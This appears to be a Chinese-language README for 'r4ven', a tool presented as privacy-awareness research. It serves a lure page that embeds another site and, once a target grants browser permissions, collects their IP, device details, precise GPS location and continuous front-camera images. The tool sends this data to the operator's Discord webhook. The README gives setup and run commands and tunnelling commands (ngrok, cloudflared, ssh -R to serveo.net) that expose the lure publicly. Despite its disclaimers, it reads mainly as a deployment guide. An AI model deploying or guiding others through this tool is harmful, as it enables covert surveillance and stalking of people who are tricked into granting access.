本项目是一个安全研究和意识提升工具,旨在演示当用户明确授予权限时,现代网络浏览器如何可能暴露位置数据、摄像头访问、IP地址和设备信息。
该工具提供一个可控制的网页,嵌入合法内容用于演示目的。当用户自愿允许浏览器权限时,应用程序会收集可用的元数据,如GPS坐标、IP信息、设备详情和摄像头输入,凸显社交工程和权限滥用如何导致意外的数据泄露。
本项目仅用于安全教育、意识培训和授权测试,旨在帮助开发者、渗透测试人员和用户更好地理解浏览器权限风险,改善隐私保护习惯。
[!IMPORTANT] 概念验证 — 仅限教育用途
本项目演示了当用户授予浏览器权限时,恶意网站可能如何收集位置数据、摄像头访问、IP地址和设备信息。 旨在提高对隐私风险的认识,并强调用户为何应避免点击不受信任的链接或批准不必要的权限。
[!CAUTION] 仅限道德与授权使用
虽然此工具展示了真实的攻击者技术,但必须严格用于教育、安全研究和授权渗透测试。 强烈反对在未获得相关方明确许可的情况下使用。
+ 它将自动获取 IP 地址和设备信息
! 如果允许位置权限,它将获取目标的确切位置。
! 如果允许摄像头权限,它将不间断地从前置摄像头捕获。
- 在没有 GPS 或摄像头的笔记本电脑/手机上无法工作,
# 浏览器阻止 JavaScript,
# 或者目标模拟 GPS 位置。
# 或者目标使用 VPN 或伪造 IP
- 部分浏览器自动阻止位置和摄像头权限(如 Brave、Safari 等)
+ 如果在智能手机上使用,位置精度将更高。
- 基于 IP 地址的地理位置不精确,
# 不提供目标的位置。
# 而是提供 ISP(互联网服务提供商)的近似位置
+ GPS 几乎获取确切位置,因为它使用经纬度坐标。
@@ 一旦授予位置权限 @@
# 接收到的位置信息精确到用户位置的 20 到 30 米以内。
# (几乎是确切位置)
git clone https://github.com/spyboy-productions/r4ven.git
cd r4ven
pip3 install -r requirements.txt
python3 r4ven.py
注意: 如果你不打算使用 localhost
index.html,将 "http://127.0.0.1:8000/image" 替换为你希望使用的 URL。或
请使用 -t 标志选择不同的 URL。
使用以下命令使 r4ven 可执行:
chmod +x r4ven.py
python3 r4ven.py [-t target]
python3 r4ven.py [-p port]
python3 r4ven.py [-t target] [-p port]
示例: python3 r4ven.py -t https://example.com/r4ven/images -p 8000
输入你的 Discord webhook URL(在你的 Discord 服务器中设置一个集成 webhook 的频道)
https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks
如果没有 Discord 账号和服务器,创建一个,它是免费的。
📍 跟踪信息数据将发送到你的 Discord webhook 频道。
index.html,替换 iframe 中的 src。(注意:并非所有网站都支持 iframe)⭓ 其他端口转发命令…
TryCloudflare: cloudflared tunnel --url http://localhost:8000
Tunnelmole: tmole 8000
Ngrok: ngrok http 8000
Ssh: ssh -R 80:localhost:8000 ssh.localhost.run
Serveo: ssh -R 80:localhost:8000 serveo.net
- 确保你进行了端口转发,否则在智能手机的浏览器上将无法工作
欢迎贡献和功能请求。如果你遇到任何问题或改进想法,欢迎提交 issue 或 pull request。